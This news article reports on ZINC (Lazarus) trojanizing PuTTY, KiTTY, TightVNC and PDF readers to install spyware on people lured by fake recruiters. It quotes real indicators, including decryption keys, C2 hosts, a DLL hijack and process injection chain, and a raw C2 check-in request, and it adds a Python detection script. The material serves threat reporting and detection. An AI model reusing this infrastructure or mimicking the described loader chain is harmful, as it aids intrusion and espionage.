Numerous organizations were hacked after installing weaponized open source apps


Hackers backed by the North Korean government are weaponizing known pieces of open-source software in an ongoing campaign that has already succeeded in compromising “numerous” media, defense and aerospace, and IT services organizations, Microsoft said Thursday.

ZINC—Microsoft’s name for a threat actor group also called Lazarus, best known for carrying out the devastating 2014 compromise of Sony Pictures Entertainment—has laced PuTTY and other legitimate open source applications with highly encrypted code that ultimately installs spyware.

The hackers then pose as job recruiters and connect with individuals from targeted organizations over LinkedIn. After developing a level of trust over a series of conversations and eventually moving them to the WhatsApp messenger, the hackers instruct the individuals to install the apps, which infect the employees’ work environments.


“The actors have successfully compromised a number of organizations since June 2022,” members of Microsoft Security Threat Intelligence and LinkedIn Threat Prevention and Defense wrote in a post. “Due to the broad use of the platforms and software used by ZINC in this campaign, ZINC may pose a significant threat to individuals and organizations across multiple sectors and regions.”

PuTTY is a popular terminal emulator, serial console, and network file transfer application that supports network protocols including SSH, SCP, Telnet, rlogin, and raw socket connections. Two weeks ago, security firm Mandiant warned that hackers with ties to North Korea had trojanized it in a campaign that successfully compromised a customer’s network. Thursday’s post said the same hackers have also weaponized KiTTY, TightVNC, Sumatra PDF Reader and muPDF/Subliminal Recording software with code that installs the same spyware, which Microsoft has dubbed ZetaNile.

Lazarus was once a bunch of hackers with only marginal resources and skills. Over the past decade, its prowess has grown considerably. Its attacks on cryptocurrency exchanges over the past five years have generated billions of dollars for the country’s WMD programs. The group regularly finds and exploits zero-day vulnerabilities in heavily fortified apps and uses many of the same malware techniques used by other state-sponsored groups.

The group primarily relies on spear phishing as the initial vector against victims, but it also uses other forms of social engineering and website compromises at times. A common theme is that members target employees of organizations they wish to compromise, often by tricking or forcing them to install trojanized software.

The trojanized PuTTY and KiTTY apps Microsoft has observed use a clever mechanism to ensure that only intended targets are infected and that others are not inadvertently infected. The app installers do not run any malicious code. Instead, the ZetaNile malware is installed only when the apps connect to a specific IP address and use credentials that fake recruiters provide to targets.

The trojanized PuTTY executable uses a technique called DLL search order hijacking, which loads and decrypts a second-stage payload when presented with the key “0CE1241A44557AA438F27BC6D4ACA246” for use as command and control. Once connected to the C2 server, the attackers can install additional malware on the compromised device. The KiTTY app works the same way.

Like KiTTY and PuTTY, the malicious TightVNC Viewer installs its final payload only when a user selects ec2-aet-tech.w-ada[.]amazonaws from the pre-populated remote hosts drop-down menu in the TightVNC Viewer.



Thursday’s post continued:

The trojanized version of Sumatra PDF Reader called SecurePDF.exe has been used by ZINC since at least 2019 and remains a unique ZINC craft. SecurePDF.exe is a modularized loader that can install the ZetaNile implant by loading a weapon-based job application theme file with a .PDF extension. The fake PDF contains a header “SPV005”, a decryption key, encrypted second-stage implant payload, and encrypted decoy PDF, which renders in Sumatra PDF Reader when the file is opened.

Once loaded into memory, the second stage malware is configured to send the victim’s system hostname and device information using custom encoding algorithms to a C2 communications server as part of the C2 check-in process. The attackers can install additional malware on the compromised devices using C2 communication as needed.


The post continued:

In the trojanized version of the muPDF/Subliminal Recording installer, setup.exe is configured to recheck the file path ISSetupPrerequisites\Setup64.exe exists and writes C:\colrctl\colorui.dll on disk after extracting the embedded executable inside setup.exe. It then copies C:\Windows\System32\ColorCpl.exe to C:\ColorCtrl\ColorCpl.exe. For second stage malware, the malicious installer creates a new process C:\colorctrl\colorcpl.exe C3A9B30B6A313F289297C9A36730DB6D and the argument C3A9B30B6A313F289297C9A36730DB6D is transferred to colorui.dll as a decryption key. DLL colorui.dll, which Microsoft tracks as the EventHorizon malware family, is injected into C:\Windows\System\credwiz.exe or iexpress.exe to send C2 HTTP requests as part of the victim’s check-in process and to obtain an additional payload.

POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]com

bbs=[encrypted payload]= &article=[encrypted payload]

The post provides technical indicators that organizations can look for to determine if any endpoints on their networks are infected. It also includes IP addresses used in the campaign that administrators can add to their network block lists.
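
The following added example, which is not from Microsoft’s post, applies two of the traits described above to telemetry: a copy of ColorCpl.exe launched from outside the Windows system directories with a single 32-hex-digit argument, and a form POST to /support/support.asp carrying only bbs and article fields. The event tuples, function names and sample values are constructed for illustration, and the key in the sample is a placeholder rather than the one quoted above.

```python
import re
from pathlib import PureWindowsPath

# Traits taken from the installer behaviour and check-in request quoted above.
HEX_KEY = re.compile(r"[0-9A-Fa-f]{32}")
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
COPIED_BINARIES = {"colorcpl.exe"}
CHECKIN_PATH = "/support/support.asp"
CHECKIN_FIELDS = {"bbs", "article"}

def score_process(image, args):
    """Reasons a process-creation event matches the described launch pattern."""
    reasons = []
    path = PureWindowsPath(image)
    if path.name.lower() in COPIED_BINARIES and str(path.parent).lower() not in SYSTEM_DIRS:
        reasons.append("system binary outside system directory")
    if len(args) == 1 and HEX_KEY.fullmatch(args[0]):
        reasons.append("sole argument is a 32-hex-digit key")
    return reasons

def score_http(method, uri, body):
    """Reasons a proxy record matches the shape of the check-in request."""
    reasons = []
    fields = {p.split("=", 1)[0].strip() for p in body.split("&") if "=" in p}
    if method.upper() == "POST" and uri.lower() == CHECKIN_PATH:
        reasons.append("POST to check-in path")
    if fields == CHECKIN_FIELDS:
        reasons.append("form body has only bbs and article fields")
    return reasons

# Constructed sample telemetry (not real logs); key and payload values are placeholders.
PROCESS_EVENTS = [
    (r"C:\Windows\System32\colorcpl.exe", []),
    (r"C:\ColorCtrl\ColorCpl.exe", ["0123456789ABCDEF0123456789ABCDEF"]),
]
PROXY_RECORDS = [
    ("POST", "/support/support.asp", "bbs=AAAA= &article=BBBB"),
    ("POST", "/login", "user=alice&article=42"),
]

def hunt():
    """Return (record, reasons) pairs for every sample record with at least one hit."""
    hits = [(e, score_process(*e)) for e in PROCESS_EVENTS]
    hits += [(r, score_http(*r)) for r in PROXY_RECORDS]
    return [(rec, why) for rec, why in hits if why]

if __name__ == "__main__":
    for rec, why in hunt():
        print(rec[:2], "->", "; ".join(why))
```

Each check is weak on its own; records that trip both reasons in a function are the ones worth triaging first.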
